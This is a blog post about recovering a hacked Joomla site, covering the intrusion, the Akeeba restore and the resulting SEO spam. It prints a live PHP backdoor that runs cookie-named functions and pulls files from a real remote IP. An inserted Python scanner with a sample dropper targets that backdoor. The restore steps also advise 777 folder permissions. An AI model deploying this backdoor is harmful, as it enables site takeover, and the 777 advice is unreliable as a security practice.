Had a recent Joomla 3.6.2 install go blank. Site was fine one day and the next it was unreachable.

I FTP'ed into the site and I saw WordPress folders in there and other strange files. There was a zip file called "cms brute rmf 3.0.zip". There were odd PHP files such as "ebb6bff35a.php". Looks like an attack for sure. The PHP file was extremely complex.

The file "ebb6bff35a.php" starts out by grabbing the id set in a cookie for "user id", then points back to the following IP with the cookie information. This IP is located in Belize.

<?php
// Calls whatever function name is in the "user" cookie, passing the "id" cookie as its argument
if (isset($_COOKIE["id"])) @$_COOKIE["user"]($_COOKIE["id"]);

// Simple check so the operator can confirm the file is reachable
if (isset($_REQUEST["test_url"])) {
    echo "file test okay";
}

// Fetches the file named in the "d" parameter from the remote host and writes it into the site
$f = $_GET["d"];
$id = $f;
$current = file_get_contents("http://80.87.205.79/$f");
file_put_contents($id, $current);

if (!defined('PCLZIP_READ_BLOCK_SIZE')) {
    define('PCLZIP_READ_BLOCK_SIZE', 2048);
}
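As an added example that is not part of the original post, here is a small Python scanner for the three indicators the dropper above shows: a cookie value called as a function, a remote fetch followed by a local write, and a bare hex file name. SAMPLE_DROPPER is a constructed sample with a placeholder host, not the real file.

```python
import os
import re

# Indicator patterns distilled from the dropper shown above.
# (a) a cookie/request value used as a function name, the shape of @$_COOKIE["user"]($_COOKIE["id"]);
COOKIE_CALL = re.compile(r'\$_(?:COOKIE|REQUEST|GET|POST)\s*\[[^\]]+\]\s*\(\s*\$_(?:COOKIE|REQUEST|GET|POST)')
# (b) a remote URL fetched with file_get_contents and then written out with file_put_contents
REMOTE_FETCH = re.compile(r'file_get_contents\s*\(\s*["\']https?://', re.IGNORECASE)
LOCAL_WRITE = re.compile(r'file_put_contents\s*\(', re.IGNORECASE)
# (c) a bare hex file name such as ebb6bff35a.php
HEX_NAME = re.compile(r'^[0-9a-f]{8,}\.php$', re.IGNORECASE)

# Constructed sample mirroring the dropper's structure (placeholder host, not the real one).
SAMPLE_DROPPER = '''<?php
if (isset($_COOKIE["id"])) @$_COOKIE["user"]($_COOKIE["id"]);
$f = $_GET["d"];
$current = file_get_contents("http://198.51.100.10/$f");
file_put_contents($f, $current);
'''


def scan_php_source(src):
    """Return the names of the indicators matched by one PHP file's source."""
    hits = []
    if COOKIE_CALL.search(src):
        hits.append("cookie-driven function call")
    if REMOTE_FETCH.search(src) and LOCAL_WRITE.search(src):
        hits.append("remote fetch written to disk")
    return hits


def scan_tree(root):
    """Walk a web root; map each suspicious .php path to the indicators it matched."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            hits = ["random hex file name"] if HEX_NAME.match(name) else []
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits.extend(scan_php_source(fh.read()))
            except OSError:
                continue  # unreadable file: skip it rather than abort the whole scan
            if hits:
                findings[path] = hits
    return findings
```

Run scan_tree() against a copy of the web root; a hit only flags a file for manual review, since legitimate code can also write files it downloads.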

(Screenshot: files in the Joomla install)

Hopefully I can figure out what happened, but I am worried about security for sure.


After contacting GoDaddy, it looks like a complete attack: PHP files were uploaded, directories were created, and I didn't get to check the database. I had to do a GoDaddy account reset and restore from an Akeeba backup.

The backup didn't go well; I got the following error.

(Screenshot: Akeeba AJAX error)

I followed the instructions on this page.

https://www.akeebabackup.com/documentation/troubleshooter/kscantextract.html

I had to create the "kicktemp" folder and set the permissions to 777. Set the type of install to FTP. For the root directory I had to use "/". Make sure to test the FTP connection.

The Kickstart restore took about 25 minutes.

Here are the specs on the site.

  • Joomla 3.6.2
  • JCE
  • Akeeba
  • Chronoforms
  • JO Facebook Events Pro
  • Hot Themes Hot Fitness template.

One of the worst parts of this whole debacle is their SEO. The site was live for a month before the attack and the analytics were clicking along nicely. The site was getting around 300-plus hits in the first month with around 100 keyword matches.

During the attack the number of keyword matches jumped to 16,000, with incredibly junky results.

(Screenshot: analytics keyword matches)

This is a running store and has nothing to do with "sexy turkey". This all happened in just a few days. I really hope this doesn't offend Google and they decide to block the site.

I hope this helps someone else out there…


Follow up:

A month after this attack I looked at all of the directories and found no trace of another attack.